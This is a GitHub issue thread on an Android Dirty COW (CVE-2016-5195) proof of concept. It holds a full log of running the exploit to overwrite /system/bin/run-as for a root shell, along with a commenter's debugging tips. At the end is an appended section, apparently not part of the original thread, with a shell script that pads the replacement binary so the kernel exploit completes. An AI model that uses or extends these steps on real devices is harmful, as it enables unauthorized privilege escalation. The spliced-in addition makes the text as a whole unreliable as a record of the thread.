timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Root shell not outputting the result of id command #65

Open zoobab opened 7 years ago

zoobab commented 7 years ago

Hi,

I am obtaining a root shell on my Meizu M2, but any command I input is giving nothing back in return:

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-22
make[1]: Entering directory `/home/zoobab/soft/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory `/home/zoobab/soft/CVE-2016-5195'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
199 KB/s (9760 bytes in 0.047s)
adb push libs/arm64-v8a/run-as /data/local/tmp/run-as
207 KB/s (9760 bytes in 0.045s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (9760) and destination file size (13864) differ

[*] size 9760
[*] mmap 0x7faf542000
[*] currently 0x7faf542000=10102464c457f
[*] madvise = 0x7faf542000 9760
[*] madvise = 0 0
[*] /proc/self/mem 1590880 163
[*] exploited 0x7faf542000=10102464c457f
adb shell /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@m2:/ # id

Any idea why?

droidvoider commented 7 years ago

When I am patching stuff, if I use the incorrect file size I know it's time to reboot. First thing: always get to the correct file size exactly. If all else fails, add headers, add some code that is only called when a variable is 987 but it never gets set... whatever it takes, make it match the size of your run-as. Get your run-as size through adb shell:

adb shell ls -la /system/bin/run-as

Ideas and maybe good tips: you should be looking at your logcat, specifically:

adb logcat | grep -a exploit

In addition to that, you can also open another adb shell while the root shell is hung and try issuing ps to list the processes, or ps | grep 'whatever_to_filter'. Next, start adding extra LOGV("TOP of run-as"); lines. You can add variables in your LOGV("values %c", charVal); and just keep poking to see what's not what.

Take notes, be organized and build a process. You are a lot closer than I am; I can't issue run-as in this example, my phone is locked down too much. Have you patched sepolicy using a method such as those findable on xda-developers? I have models like my phone with custom ROMs; I have AT&T, I could use those init and base files. Maybe you can too? Check rooting methods for other devices using dirtycow on GitHub also.

good luck
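droidvoider's first point, making the replacement exactly the size of /system/bin/run-as, can be done without recompiling with filler code: the dcow PoC writes only as many bytes as the replacement is long, which is why it warns that 9760 and 13864 differ, and zero bytes appended after an ELF's section-header table are never read by the loader, so padding the built run-as with zeros makes the sizes agree. The script below is an added example written for this thread, not the PoC's own code and not something either commenter posted. It assumes a POSIX shell with wc, head and od, that you take the target size (13864 in the session above) from adb shell ls -la /system/bin/run-as, and that the replacement is a plain ELF binary; the file name pad_runas.sh is hypothetical. Whether a matching size clears the silent shell zoobab sees is not something this thread establishes, so treat it as the first check, not the fix.

```shell
#!/bin/sh
# Added example: zero-pad a dirtycow replacement binary to the size of the
# file it will overwrite. Not part of timwr/CVE-2016-5195.

# file_size FILE: print the size of FILE in bytes.
file_size() {
    wc -c < "$1" | tr -d ' '
}

# pad_to_size FILE SIZE: append zero bytes to FILE until it is exactly SIZE
# bytes long, then print the resulting size. A replacement that is already
# larger than the target is refused, because dcow would write past the
# target's pages; it has to be rebuilt smaller instead.
pad_to_size() {
    file=$1
    want=$2
    have=$(file_size "$file")
    if [ "$have" -gt "$want" ]; then
        echo "pad_to_size: $file is $have bytes, larger than target $want; rebuild it smaller" >&2
        return 1
    fi
    if [ "$have" -lt "$want" ]; then
        # Trailing zeros sit after the ELF section-header table, which the
        # loader locates by offset from the start, so they are ignored.
        head -c "$((want - have))" /dev/zero >> "$file"
    fi
    file_size "$file"
}

# is_elf FILE: check that FILE still starts with the ELF magic 7f 45 4c 46.
# This is the same value the PoC prints as "currently 0x...=10102464c457f"
# (the first 8 bytes of the mapping read little-endian: \x7fELF, 64-bit, LE).
is_elf() {
    [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# Stand-alone use (assumed invocation, not a Makefile target of the PoC):
#   sh pad_runas.sh libs/arm64-v8a/run-as 13864
# where 13864 is the size reported by: adb shell ls -la /system/bin/run-as
# Afterwards, re-run the adb push and dcow steps; the size warning should be gone.
if [ "$#" -ge 2 ]; then
    pad_to_size "$1" "$2" > /dev/null && is_elf "$1" && echo "$1 padded to $2 bytes"
fi
```

Run it on the host against the freshly built libs/arm64-v8a/run-as before the adb push step; if it reports the binary is already larger than the device's run-as, padding cannot help and the binary has to be rebuilt smaller, which is the opposite of the problem in this thread.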